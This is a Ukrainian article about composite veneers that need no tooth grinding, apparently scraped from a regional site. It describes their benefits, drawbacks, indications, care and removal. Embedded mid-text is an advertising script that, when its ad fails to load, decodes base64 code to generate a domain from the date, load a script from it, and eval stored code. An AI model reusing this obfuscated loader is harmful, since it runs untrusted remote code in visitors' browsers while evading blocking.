Композитні вініри без обточування

Композитні вініри – це зубні накладки, які формуються із фотополімерних матеріалів та не потребують попереднього обточування поверхні. Вони встановлюються прямим методом фіксації, коли мікропротез формується на емалі та потребує мінімальної обробки.

Якщо у пацієнта тонка емаль, сточування поверхні тільки зашкодить, то ж у цьому випадку лікар рекомендує саме композитні пластинки. За допомогою вінірів можна скорегувати форму, розмір та колір зуба. Зубні тканини, які знаходяться під пластиною, надійно захищені від руйнування, травм та потоншення.

Пацієнти відмічають наступні переваги вінірів із композитних матеріалів:

Швидкий результат. Встановлюються за один візит до стоматолога, якщо зуби не потребують ретельного лікування. Не потрібно чекати на виготовлення мікропротеза. Лікар наносить композитні матеріали на емаль та одразу формує накладку.Доступна ціна. Коштує дешевше, ніж встановлення інших видів мікропротезів, та дарує білосніжну посмішку.Просте встановлення та заміна. Фотополімер, який слугує матеріалом для формування накладок, за необхідності можна замінити.Мінімальна травматизація. Перед встановленням не потрібно сточувати зубну емаль для надійного закріплення.

Серед недоліків варто зазначити чутливість вінірів до агресивних харчових барвників, недовготривалий термін використання, в порівнянні з цирконієвими мікропротезами. Через недостатній рівень світловідбивання пластинки трохи відрізняються від природних зубів. Якщо обрати досвідченого фахівця та належним чином доглядати за накладками, недоліки будуть невідчутними.

Що таке композитні вініри?

Композитні вініри виготовляються із фотополімерного матеріалу, схожого на той, що використовується при пломбуванні. До полімеру додаються частинки кераміки, щоб досягти більшої міцності та естетичності.

Сучасні пломбувальні матеріали добре поліруються та щільно прилягають до зубної емалі. Вони швидко стають твердими, тому реставрацію зубів можна провести за один візит до стоматолога. Фотополімерні пластинки дозволяють коригувати форму та розміщення зуба без брекет-системи.

В яких випадках рекомендовано встановлення композитних вінірів:

плями, потемніння зубів;надмірне стирання та тріщині на емалі;великі міжзубні проміжки;клиподібний дефект;зміна кольору зубів після прийому лікарських препаратів.

Мікропротези з полімерних матеріалів використовують для реставрації невеликої кількості зубів. Фотополімерні пластинки встановлюють у зоні посмішки, що можливо навіть при наявності невеликого бюджета. Для бокових зубів вони не підходять через недостатню міцність – краще обрати цирконієві вініри.

Композитні вініри: до та після

Обираючи вініри з композита, потрібно розуміти, що за оптичними властивостями, естетикою та міцністю вони поступаються керамічним варіантам. Натомість вони більш доступні за ціною, не потребують обточування зубної емалі та встановлюються за одне відвідування. Це недорогий спосіб створити голлівудську усмішку. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Пряма реставрація різців фотополімерними матеріалами. Джерело kes.com.ua

Якість вінірів можна оцінити на фото, де показана реконструкція різців. Процедура виконана прямим способом реставрації, за допомогою якого вдалося скорегувати форму та розмір різців. Відтінок матеріалу підібраний у тон з зубами, тому накладки не виділяються в зубному ряді.

Термін носіння вінірів з композитних матеріалів – до 10 років. Щоб їх поверхня не темніла, слід обмежити вживання їжі та напоїв із барвниками. Від чаю, кави, спецій, вина та паління вініри можуть швидко зіпсуватись. Щоб пластинки довше залишались у хорошому стані, потрібно дотримуватись правил особистої гігієни – чистити зуби м’якою щіткою та використовувати іригатор.

Вирівнювання зубів вінірами

Композитні вініри встановлюються двома способами – прямим та непрямим. Другий варіант потребує попереднього сточування зубів, а самі накладки виготовляються в зуботехнічній лабораторії. Прямий спосіб встановлення – швидкий та безболісний, його можна порівняти зі звичайним пломбуванням. Він складається з таких етапів:

санація ротової порожнини, лікування карієсу, пломбування отворів;підбір відтінку фотополімеру;накладання матеріалу на емаль, вирівнювання, надання потрібної форми;закріплення композита під дією світлового потоку.

Пошарове нанесення дозволяє провести реставрацію 1-3 зубів за одне відвідування стоматолога. Якщо потрібно поставити вініри на весь зубний ряд, краще вибрати непрямий спосіб, який потребує як мінімум двох звернень. На прийомі лікар оцінить стан ротової порожнини та порекомендує оптимальний варіант реставрації.

Зняття старих композитних реставрацій із заміною на керамічні коронки. Джерело kes.com.ua

Мінуси після зняття вінірів

Композитні вініри не тільки швидко встановлюються, а й просто знімаються у стоматолога. Після зняття зуби втрачають естетичний вигляд та стають більш схильними до пошкоджень. Якщо пацієнт довгий час носив пластинки, різниця після зняття буде помітна. Знімати їх не рекомендується без вагомої причини, це можна робити тільки за показаннями в кабінеті стоматолога. Які можуть бути показання:

Зношений матеріал. Термін носіння залежить від типу матеріалу – наприклад, цирконієві слугують довше за композитні. З часом естетика втрачається та мікропротези стають помітні серед натуральних зубів.Порушення цілісності. Виникає через неправильний догляд та порушення експлуатації. Стоматологи попереджають, що під час носіння накладок не можна гризти горіхи, тверді овочі та фрукти. Якщо з’являються сколи, вінір потрібно замінити.Розвиток карієсу. Перед встановленням пластинок треба обов’язково вилікувати карієс, інакше каріозні порожнини будуть збільшуватись, вініри доведеться зняти.

Зняття вінірів відбувається у стоматолога за допомогою спеціальних приладів. Їх можна зішліфувати або відклеїти від зуба, спосіб залежить від методики кріплення пластинок. Після цього можна встановити нові композитні вініри або накладки з більш міцних та довговічних матеріалів. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kompozitni-viniri-bez-obtochuvannya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top